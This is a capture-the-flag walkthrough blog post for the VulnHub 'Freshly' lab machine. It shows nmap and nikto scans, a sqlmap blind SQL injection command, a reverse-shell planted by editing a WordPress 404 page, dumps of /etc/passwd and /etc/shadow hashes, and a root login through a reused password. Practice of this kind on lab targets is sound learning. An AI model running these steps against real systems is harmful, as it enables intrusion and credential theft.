30 March 2023

Pentesting Fun Stuff

following the cyber security path…

TopHatSec: Freshly

Location

https://www.vulnhub.com/entry/tophatsec-freshly,118/

Description

The goal of this challenge is to break into the machine via the web and find the secret hidden in a sensitive file. If you can find the secret, send me an email for verification. 🙂
There are a couple of different ways that you can go with this one. Good luck!

Enumeration

Because I need an entry point, I’m going to start with a nmap scan to discover some open ports.

nmap -A -T4 -sV -p- 192.168.110.5

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-08-11 14:29 CEST
Nmap scan report for 888.darknet.com (192.168.110.2)
Host is up (0.013s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-02-17T03:30:05
|_Not valid after: 2025-02-14T03:30:05
8080/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
Device type: bridge|general purpose
Running (JUST GUESSING): Oracle Virtualbox (96%), QEMU (95%)
OS CPE: cpe:/o:oracle:virtualbox cpe:/a:qemu:qemu
Aggressive OS guesses: Oracle Virtualbox (96%), QEMU user mode network gateway (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 0.26 ms 10.0.3.2
2 0.31 ms 888.darknet.com (192.168.110.2)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.52 seconds

So port 80, 443, and 8080 are open. I’ll start with port 80.
“These are not the droids you’re looking for”. Always love that sentence! Let’s check if it’s a reference to /robots.txt? Nothing.

nikto -h http://192.168.110.2/

+ /login.php: Admin login page/section found.
+ /phpmyadmin/: phpMyAdmin directory found

web1
phpmyadmin.JPG

SQL Injection

Two login pages. When I try /login.php first there is nothing of interest in the source code. Also the HTTP header shows nothing of interest. I try to inject some single quotes to get an error but nothing. I’m going to try login number 2, but in the meantime I’m going to give sqlmap a try with login number 1.

sqlmap -u “http://192.168.110.2/login.php/” –data=”user=&password=&s=Submit” –random-agent –not-string=”0″ –level=5 –risk=3

Login number 2 is a phpMyadmin page. When I try to login, I get a response.
phpmyadmin-error
A MySQL server. Lets try some single quotes here. I try different combinations, but I don’t get a wanted response. In the meantime I check on the running sqlmap and see that the first login page is vulnerable to time-based blind SQLi.
tables
sqlmap-table1
sqlmap-table2
So I get the credentials of two users. Let’s log in with the first user. When I login with the known credentials there is a response on the page in the form of a ‘1’. When using bogus credentials the response on the page is ‘0’. Because there is nothing to retrieve from this page I let sqlmap retrieve the credentials from the tables phpmyadmin and wordpress8080.
wordpress8080.JPG
When I visit the website on port 8080 there is a comment:

Nice Find!...Proceed

Again, no robots.txt and except a page named /img/ (with a collection of pictures inside), there was nothing to find with nikto. When I proceed I arrive at a wordpress site.
logo
There is a comment on the page with a small reference to Star Wars again.

Hmm….. maybe you missed something ? –jedi mind tricks….

I don’t think I missed something, seeing I probably got the credentials for logging in the wordpress account. Time to use the credentials.

WordPress

admin.JPG

Getting a reverse shell

To get a reverse shell, I’m altering the 404 page and replace the php code with the php reverse shell code from pentestmonkey.
shell
reverse_shell.JPG
And I’m in. Time to search around the system.

python -c ‘import pty;pty.spawn(“/bin/bash”)’
daemon@Freshly:/$ cat /etc/*-release
cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION=”Ubuntu 14.04.1 LTS”
NAME=”Ubuntu”
VERSION=”14.04.1 LTS, Trusty Tahr”
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME=”Ubuntu 14.04.1 LTS”
VERSION_ID=”14.04″
HOME_URL=”http://www.ubuntu.com/”
SUPPORT_URL=”http://help.ubuntu.com/”
BUG_REPORT_URL=”http://bugs.launchpad.net/ubuntu/”
daemon@Freshly:/$ uname -a
uname -a
Linux Freshly 3.13.0-45-generic #74-Ubuntu SMP Tue Jan 13 19:37:48 UTC 2015 i686 i686 i686 GNU/Linux

Ubuntu 14.04 with kernel 3.13. I know that there is a privilege escalation possible when using overlayfs mounts inside of user namespaces. To get the script to work I need to compile it. So I need gcc. Let’s see if it available.

daemon@Freshly:/tmp$ compgen -c | grep -i “gcc”
compgen -c | grep -i “gcc”
daemon@Freshly:/tmp$

Noting. Bummer.
Time to move along and search some more.

daemon@Freshly:/$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
user:x:1000:1000:user,,,:/home/user:/bin/bash
mysql:x:103:111:MySQL Server,,,:/nonexistent:/bin/false
candycane:x:1001:1001::/home/candycane:
# YOU STOLE MY SECRET FILE!
# SECRET = “NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!”

Ok. This was a bit unexpected. Guess this wraps this challenge up. Only thing is that I don’t have root access and I haven’t pwned this machine. Stopping now will leave me with an unsatisfying feeling.

daemon@Freshly:/home$ cat /etc/shadow
cat /etc/shadow
root:$6$If.Y9A3d$L1/qOTmhdbImaWb40Wit6A/wP5tY5Ia0LB9HvZvl1xAGFKGP5hm9aqwvFtDIRKJaWkN8cuqF6wMvjl1gxtoR7/:16483:0:99999:7:::
daemon:*:16483:0:99999:7:::
bin:*:16483:0:99999:7:::
sys:*:16483:0:99999:7:::
sync:*:16483:0:99999:7:::
games:*:16483:0:99999:7:::
man:*:16483:0:99999:7:::
lp:*:16483:0:99999:7:::
mail:*:16483:0:99999:7:::
news:*:16483:0:99999:7:::
uucp:*:16483:0:99999:7:::
proxy:*:16483:0:99999:7:::
www-data:*:16483:0:99999:7:::
backup:*:16483:0:99999:7:::
list:*:16483:0:99999:7:::
irc:*:16483:0:99999:7:::
gnats:*:16483:0:99999:7:::
nobody:*:16483:0:99999:7:::
libuuid:!:16483:0:99999:7:::
syslog:*:16483:0:99999:7:::
messagebus:*:16483:0:99999:7:::
user:$6$MuqQZq4i$t/lNztnPTqUCvKeO/vvHd9nVe3yRoES5fEguxxHnOf3jR/zUl0SFs825OM4MuCWlV7H/k2QCKiZ3zso.31Kk31:16483:0:99999:7:::
mysql:!:16483:0:99999:7:::
candycane:$6$gfTgfe6A$pAMHjwh3aQV1lFXtuNDZVYyEqxLWd957MSFvPiPaP5ioh7tPOwK2TxsexorYiB0zTiQWaaBxwOCTRCIVykhRa/:16483:0:99999:7:::
# YOU STOLE MY PASSWORD FILE!
# SECRET = “NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!”

After a really long time. I tried to use different passwords that were stored in the database on the root account and guess what? Passwords are reused in this challenge 🙂

daemon@Freshly:/$ su root
su root
Password: SuperSecretPassword
root@Freshly:/# id
id
uid=0(root) gid=0(root) groups=0(root)

Now I can close this challenge with a satisfied feeling.
Good work on making this challenge.